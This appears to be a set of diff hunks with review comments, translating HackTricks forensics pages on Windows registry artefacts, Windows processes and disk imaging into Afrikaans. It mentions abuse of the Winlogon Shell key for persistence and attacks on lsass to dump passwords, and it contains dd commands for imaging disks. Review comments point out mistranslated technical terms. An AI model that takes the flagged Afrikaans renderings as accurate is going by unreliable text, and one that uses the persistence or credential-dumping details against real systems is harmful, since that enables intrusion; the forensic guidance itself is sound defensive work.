|
||||
- Onder **`Software\Microsoft\Windows NT\CurrentVersion`** sal jy die Windows-weergawe, dienspakket, installasie-tyd en die geregistreerde eienaar se naam op 'n maklike manier vind.
|
||||
|
||||
### **Computer Name**
|
||||
- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**.
|
||||
### **Rekenaarnaam**
|
||||
- Die rekenaarnaam word gevind onder **`System\ControlSet001\Control\ComputerName\ComputerName`**.
|
||||
|
||||
### **Time Zone Setting**
|
||||
- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**.
|
||||
### **Tydsone-instelling**
|
||||
- Die stelsel se tydsone word gestoor in **`System\ControlSet001\Control\TimeZoneInformation`**.
|
||||
|
||||
### **Access Time Tracking**
|
||||
- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
|
||||
`fsutil behavior set disablelastaccess 0`
|
||||
### **Toegangstydopsporing**
|
||||
- Standaard is die laaste toegangstydopsporing afgeskakel (**`NtfsDisableLastAccessUpdate=1`**). Om dit in te skakel, gebruik:
|
||||
`fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Windows Versions and Service Packs
|
||||
- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.
|
||||
### Windows-weergawes en dienspakette
|
||||
- Die **Windows-weergawe** dui die uitgawe aan (bv. Home, Pro) en sy vrystelling (bv. Windows 10, Windows 11), terwyl **dienspakette** opdaterings is wat herstelwerk en soms nuwe funksies insluit.
|
||||
|
||||
### Enabling Last Access Time
|
||||
- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring.
|
||||
### Aktivering van laaste toegangstyd
|
||||
- Die aktivering van laaste toegangstydopsporing stel jou in staat om te sien wanneer lêers laas geopen is, wat krities kan wees vir forensiese analise of stelselmonitering.
|
||||
|
||||
### Network Information Details
|
||||
- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions.
|
||||
### Netwerkinligtingbesonderhede
|
||||
- Die register bevat uitgebreide data oor netwerk-konfigurasies, insluitend **netwerksoorte (draadloos, kabel, 3G)** en **netwerkkategorieë (Openbaar, Privaat/Tuis, Domein/Werk)**, wat belangrik is vir die verstaan van netwerksekuriteitsinstellings en toestemmings.
|
||||
|
||||
### Client Side Caching (CSC)
|
||||
- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity.
|
||||
### Kliëntkant-caching (CSC)
|
||||
- **CSC** verbeter die toegang tot lêers buite lyn deur kopieë van gedeelde lêers te kas. Verskillende **CSCFlags**-instellings beheer hoe en watter lêers gekas word, wat die prestasie en gebruikerservaring beïnvloed, veral in omgewings met onderbroke konnektiwiteit.
|
||||
|
||||
### AutoStart Programs
|
||||
- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software.
|
||||
### Outomatiese beginprogramme
|
||||
- Programme wat in verskillende `Run`- en `RunOnce`-registernøkke gelys word, word outomaties by opstart geloods, wat die stelselopstarttyd beïnvloed en moontlik punte van belang kan wees om kwaadwillige sagteware of ongewenste sagteware te identifiseer.
|
||||
|
||||
### Shellbags
|
||||
- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means.
|
||||
- **Shellbags** stoor nie net voorkeure vir vouer-aansigte nie, maar verskaf ook forensiese bewyse van vouertoegang selfs as die vouer nie meer bestaan nie. Dit is van onskatbare waarde vir ondersoeke en onthul gebruikersaktiwiteit wat nie duidelik is deur ander middels nie.
|
||||
|
||||
### USB Information and Forensics
|
||||
- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents.
|
||||
### USB-inligting en forensika
|
||||
- Die besonderhede wat in die register oor USB-toestelle gestoor word, kan help om vas te stel watter toestelle aan 'n rekenaar gekoppel was, moontlik 'n toestel aan gevoelige lêeroordragte of ongemagtigde toegangsgevalle te koppel.
|
||||
|
||||
### Volume Serial Number
|
||||
- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices.
|
||||
### Volume-seriëlenommer
|
||||
- Die **Volume-seriëlenommer** kan van kritieke belang wees vir die opsporing van die spesifieke instansie van 'n lêersisteem, wat nuttig is in forensiese scenario's waar lêeroorsprong oor verskillende toestelle vasgestel moet word.
|
||||
|
||||
### **Shutdown Details**
|
||||
- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**.
|
||||
### **Afsluitingsbesonderhede**
|
||||
- Afsluitingstyd en telling (laasgenoemde slegs vir XP) word in **`System\ControlSet001\Control\Windows`** en **`System\ControlSet001\Control\Watchdog\Display`** gehou.
|
||||
|
||||
### **Network Configuration**
|
||||
- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
|
||||
- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
|
||||
### **Netwerk-konfigurasie**
|
||||
- Vir gedetailleerde netwerkinterface-inligting, verwys na **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
|
||||
- Eerste en laaste netwerkverbindings-tye, insluitend VPN-verbindings, word gelog onder verskillende paaie in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
|
||||
|
||||
### **Shared Folders**
|
||||
- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability.
|
||||
### **Gedeelde vouers**
|
||||
- Gedeelde vouers en instellings is onder **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Kliëntkant-caching (CSC) instellings bepaal die beskikbaarheid van lêers buite lyn.
|
||||
|
||||
### **Programs that Start Automatically**
|
||||
- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup.
|
||||
### **Programme wat outomaties begin**
|
||||
- Paaie soos **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** en soortgelyke inskrywings onder `Software\Microsoft\Windows\CurrentVersion` beskryf programme wat by opstart ingestel is om uit te voer.
|
||||
|
||||
### **Searches and Typed Paths**
|
||||
- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively.
|
||||
### **Soektogte en getikte paaie**
|
||||
- Ontdekkingsreisiger-soektogte en getikte paaie word in die register onder **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** vir WordwheelQuery en TypedPaths, onderskeidelik, gevolg.
|
||||
|
||||
### **Recent Documents and Office Files**
|
||||
- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths.
|
||||
### **Onlangse dokumente en Office-lêers**
|
||||
- Onlangse dokumente en Office-lêers wat geopen is, word aangeteken in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` en spesifieke Office-weergawepaaie.
|
||||
|
||||
### **Most Recently Used (MRU) Items**
|
||||
- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`.
|
||||
### **Mees onlangs gebruikte (MRU) items**
|
||||
- MRU-lyste, wat onlangse lêerpaaie en opdragte aandui, word gestoor in verskillende `ComDlg32`- en `Explorer`-subnøkke onder `NTUSER.DAT`.
|
||||
|
||||
### **User Activity Tracking**
|
||||
- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
|
||||
### **Gebruikersaktiwiteitopsporing**
|
||||
- Die Gebruikerhulp-funksie hou gedetailleerde toepassingsgebruikstatistieke by, insluitend uitvoertelling en laaste uitvoertyd, by **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
|
||||
|
||||
### **Shellbags Analysis**
|
||||
- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis.
|
||||
### **Shellbags-analise**
|
||||
- Shellbags, wat vouertoegangsdetails onthul, word gestoor in `USRCLASS.DAT` en `NTUSER.DAT` onder `Software\Microsoft\Windows\Shell`. Gebruik **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** vir analise.
|
||||
|
||||
### **USB Device History**
|
||||
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps.
|
||||
- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**.
|
||||
- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively.
|
||||
|
||||
This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability.
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
### **USB-toestelgeskiedenis**
|
||||
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** en **`HKLM\SYSTEM\ControlSet001\Enum\USB`** bevat ryk besonderhede oor gekoppelde USB-toestelle, insluitend vervaardiger, produknaam en koppeltydstempels.
|
||||
- Die gebruiker wat met 'n spesifieke USB-toestel
|
||||
|
|
|
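Review bot: the Afrikaans bullets under "Outomatiese beginprogramme" and "Mees onlangs gebruikte (MRU) items" write "registernøkke" and "subnøkke"; "ø" is not an Afrikaans letter, and the usual terms are "registersleutels" and "subsleutels". Two Windows feature names have also been translated where they should stay as identifiers: "Explorer searches" became "Ontdekkingsreisiger-soektogte" and "User Assist" became "Gebruikerhulp-funksie", while the registry paths quoted on the same lines still read `...\Explorer` and `...\Explorer\UserAssist\{GUID}\Count`; keep "Explorer" and "UserAssist" so the prose matches the keys a reader will look for. "Volume-seriëlenommer" is likewise non-standard; "volume-reeksnommer" is the common rendering, but either way use one spelling consistently with the USB section that refers to the same value.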
@ -1,147 +1,137 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## smss.exe
|
||||
|
||||
**Session Manager**.\
|
||||
Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree.
|
||||
**Sessiebestuurder**.\
|
||||
Sessie 0 begin **csrss.exe** en **wininit.exe** (**OS-dienste**) terwyl Sessie 1 **csrss.exe** en **winlogon.exe** (**Gebruiker-sessie**) begin. Jy behoort egter **slegs een proses** van daardie **binêre lêer** sonder kinders in die prosesseboom te sien.
|
||||
|
||||
Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring.
|
||||
Daarbenewens kan sessies anders as 0 en 1 beteken dat RDP-sessies plaasvind.
|
||||
|
||||
|
||||
## csrss.exe
|
||||
|
||||
**Client/Server Run Subsystem Process**.\
|
||||
It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**.
|
||||
**Kliënt/Bediener Uitvoeringsondersteuningsproses**.\
|
||||
Dit bestuur **prosesse** en **drade**, maak die **Windows API** beskikbaar vir ander prosesse en **koppel stuurprogramme aan**, skep **tydelike lêers**, en hanteer die **afsluitingsproses**.
|
||||
|
||||
There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**.
|
||||
Daar is een wat in Sessie 0 loop en nog een in Sessie 1 (dus **2 prosesse** in die prosesseboom). Nog een word geskep **per nuwe Sessie**.
|
||||
|
||||
|
||||
## winlogon.exe
|
||||
|
||||
**Windows Logon Process**.\
|
||||
It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them.
|
||||
**Windows Aantekenproses**.\
|
||||
Dit is verantwoordelik vir gebruiker **aanmelding**/**afmelding**. Dit begin **logonui.exe** om vir gebruikersnaam en wagwoord te vra en roep dan **lsass.exe** aan om dit te verifieer.
|
||||
|
||||
Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**.
|
||||
Daarna begin dit **userinit.exe** wat gespesifiseer word in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** met die sleutel **Userinit**.
|
||||
|
||||
Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**.
|
||||
Daarbenewens moet die vorige register **explorer.exe** in die **Shell-sleutel** hê, anders kan dit misbruik word as 'n **kwaadwillige volhardingsmetode**.
|
||||
|
||||
|
||||
## wininit.exe
|
||||
|
||||
**Windows Initialization Process**. \
|
||||
It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process.
|
||||
**Windows Inisialisasieproses**. \
|
||||
Dit begin **services.exe**, **lsass.exe**, en **lsm.exe** in Sessie 0. Daar behoort slegs 1 proses te wees.
|
||||
|
||||
|
||||
## userinit.exe
|
||||
|
||||
**Userinit Logon Application**.\
|
||||
Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**.
|
||||
**Userinit Aanmeldingsprogram**.\
|
||||
Laai die **ntuser.dat in HKCU** en inisialiseer die **gebruikersomgewing** en voer **aanmeldingskripte** en **GPO** uit.
|
||||
|
||||
It launches **explorer.exe**.
|
||||
Dit begin **explorer.exe**.
|
||||
|
||||
|
||||
## lsm.exe
|
||||
|
||||
**Local Session Manager**.\
|
||||
It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc.
|
||||
**Plaaslike Sessiebestuurder**.\
|
||||
Dit werk saam met smss.exe om gebruikersessies te manipuleer: Aanmelding/afmelding, skerm begin, skerm sluit/ontsluit, ens.
|
||||
|
||||
After W7 lsm.exe was transformed into a service (lsm.dll).
|
||||
Na W7 is lsm.exe omskep in 'n diens (lsm.dll).
|
||||
|
||||
There should only be 1 process in W7 and from them a service running the DLL.
|
||||
Daar behoort slegs 1 proses in W7 te wees en daarvandaan 'n diens wat die DLL uitvoer.
|
||||
|
||||
|
||||
## services.exe
|
||||
|
||||
**Service Control Manager**.\
|
||||
It **loads** **services** configured as **auto-start** and **drivers**.
|
||||
**Diensbeheerder**.\
|
||||
Dit **laai** **dienste** wat as **outomatiese aanvang** en **bestuurders** gekonfigureer is.
|
||||
|
||||
It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more.
|
||||
Dit is die ouerproses van **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** en nog baie meer.
|
||||
|
||||
Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe.
|
||||
Dienste word gedefinieer in `HKLM\SYSTEM\CurrentControlSet\Services` en hierdie proses onderhou 'n databasis in die geheue van diensinligting wat deur sc.exe ondervra kan word.
|
||||
|
||||
Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**.
|
||||
Let daarop hoe **sommige** **dienste** in 'n **eie proses** sal loop en ander sal 'n **svchost.exe-proses deel**.
|
||||
|
||||
There should only be 1 process.
|
||||
Daar behoort slegs 1 proses te wees.
|
||||
|
||||
|
||||
## lsass.exe
|
||||
|
||||
**Local Security Authority Subsystem**.\
|
||||
It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`.
|
||||
**Plaaslike Sekuriteitsowerheidsondersteuning**.\
|
||||
Dit is verantwoordelik vir die gebruiker se **verifikasie** en skep die **sekuriteitstokens**. Dit gebruik verifikasiepakkette wat in `HKLM\System\CurrentControlSet\Control\Lsa` geleë is.
|
||||
|
||||
It writes to the **Security** **event** **log** and there should only be 1 process.
|
||||
Dit skryf na die **Sekuriteit-gebeurtenislogboek** en daar behoort slegs 1 proses te wees.
|
||||
|
||||
Keep in mind that this process is highly attacked to dump passwords.
|
||||
Hou in gedagte dat hierdie proses hoogs aangeval word om wagwoorde te dump.
|
||||
|
||||
|
||||
## svchost.exe
|
||||
|
||||
**Generic Service Host Process**.\
|
||||
It hosts multiple DLL services in one shared process.
|
||||
**Generiese Diensgasheerproses**.\
|
||||
Dit bied onderdak aan verskeie DLL-dienste in een gedeelde proses.
|
||||
|
||||
Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process.
|
||||
Gewoonlik sal jy vind dat **svchost.exe** met die `-k` vlag geloods word. Dit sal 'n navraag na die register **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** loods waar daar 'n sleutel met die genoemde argument sal wees wat die dienste bevat wat in dieselfde proses geloods moet word.
|
||||
|
||||
For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
|
||||
Byvoorbeeld: `-k UnistackSvcGroup` sal loods: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
|
||||
|
||||
If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument.
|
||||
As die **vlag `-s`** ook saam met 'n argument gebruik word, word svchost gevra om **slegs die gespesifiseerde diens** in hierdie argument te loods.
|
||||
|
||||
There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious.
|
||||
Daar sal verskeie prosesse van `svchost.exe` wees. As een van hulle **nie die `-k` vlag gebruik nie**, is dit baie verdag. As jy vind dat **services.exe nie die ouerproses is nie**, is dit ook baie verdag.
|
||||
|
||||
|
||||
## taskhost.exe
|
||||
|
||||
This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs.
|
||||
Hierdie proses tree op as 'n gasheer vir prosesse wat van DLL's loop. Dit laai ook die dienste wat van DLL's loop.
|
||||
|
||||
In W8 this is called taskhostex.exe and in W10 taskhostw.exe.
|
||||
In W8 word dit taskhostex.exe genoem en in W10 taskhostw.exe.
|
||||
|
||||
|
||||
## explorer.exe
|
||||
|
||||
This is the process responsible for the **user's desktop** and launching files via file extensions.
|
||||
Hierdie is die proses wat verantwoordelik is vir die **gebruiker se lessenaar** en die loods van lêers via lêeruitbreidings.
|
||||
|
||||
**Only 1** process should be spawned **per logged on user.**
|
||||
**Slegs 1** proses behoort **per aangemelde gebruiker** gegenereer te word.
|
||||
|
||||
This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
|
||||
Dit word uitgevoer vanaf **userinit.exe** wat beëindig moet word, sodat **geen ouerproses** vir hierdie proses moet verskyn nie.
|
||||
|
||||
|
||||
# Catching Malicious Processes
|
||||
# Vang kwaadwillige prosesse
|
||||
|
||||
* Is it running from the expected path? (No Windows binaries run from temp location)
|
||||
* Is it communicating with weird IPs?
|
||||
* Check digital signatures (Microsoft artifacts should be signed)
|
||||
* Is it spelled correctly?
|
||||
* Is running under the expected SID?
|
||||
* Is the parent process the expected one (if any)?
|
||||
* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
|
||||
* Loop dit vanaf die verwagte pad? (Geen Windows-binêre lêers loop vanaf 'n tydelike plek nie)
|
||||
* Kommunikeer dit met vreemde IP-adresse?
|
||||
* Kontroleer digitale handtekeninge (Microsoft-artefakte moet onderteken wees)
|
||||
* Is dit korrek gespel?
|
||||
* Loop dit onder die verwagte SID?
|
||||
* Is die ouerproses die verwagte een (indien enige)?
|
||||
* Is die kinderprosesse die verwagte (geen cmd.exe, wscript.exe, powershell.exe nie)?
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, ky
|
||||
|
|
|
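Review bot: three renderings in this hunk change the technical meaning of the English. Under csrss.exe, "maps drive letters" has become "koppel stuurprogramme aan" (attaches drivers); "ken skyfletters toe" keeps the sense. Under lsm.exe, "shell start, lock/unlock desktop" has become "skerm begin, skerm sluit/ontsluit" (screen start, lock/unlock screen); suggest "shell-begin, lessenaar sluit/ontsluit". Under services.exe, "drivers" is rendered "bestuurders", which in Afrikaans reads as vehicle drivers or managers; "drywers" is the computing term. Minor: the last bullet of "Vang kwaadwillige prosesse" drops the question mark of the English "(no cmd.exe, wscript.exe, powershell.exe..?)", so it no longer reads as a check like its siblings. The English lines still carry the typos "Mover over" and "ntduser.dat"; the translation already reads "Daarbenewens" and "ntuser.dat", so those are fixes for the English source rather than for this hunk.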
@ -1,46 +1,53 @@
|
|||
# Image Acquisition & Mount
|
||||
# Beeldverwerwing & Monteer
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
## Acquisition
|
||||
## Verwerwing
|
||||
|
||||
### DD
|
||||
|
||||
```bash
|
||||
#This will generate a raw copy of the disk
|
||||
dd if=/dev/sdb of=disk.img
|
||||
```
|
||||
|
||||
### dcfldd
|
||||
|
||||
dcfldd is a command-line tool that is used for creating and hashing disk images. It is an enhanced version of the dd command and provides additional features such as on-the-fly hashing, progress reporting, and error handling.
|
||||
|
||||
To use dcfldd, you need to specify the input and output files or devices. You can also specify options such as block size, hash algorithm, and progress reporting interval.
|
||||
|
||||
Here is an example command to create a disk image using dcfldd:
|
||||
|
||||
```
|
||||
dcfldd if=/dev/sda of=image.dd bs=4M hash=md5 hashwindow=10M hashlog=image.md5.log statusinterval=1MB
|
||||
```
|
||||
|
||||
In this example, we are creating a disk image from the /dev/sda device and saving it as image.dd. We are using a block size of 4MB and hashing the image using the MD5 algorithm. The hash window is set to 10MB, which means that the hash is calculated for every 10MB of data. The hash log is saved in the image.md5.log file. The status interval is set to 1MB, which means that progress is reported every 1MB.
|
||||
|
||||
dcfldd is a powerful tool that can be used for forensic imaging and data acquisition. It is widely used in the field of digital forensics and can help in preserving and analyzing evidence.
|
||||
```bash
|
||||
#Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data)
|
||||
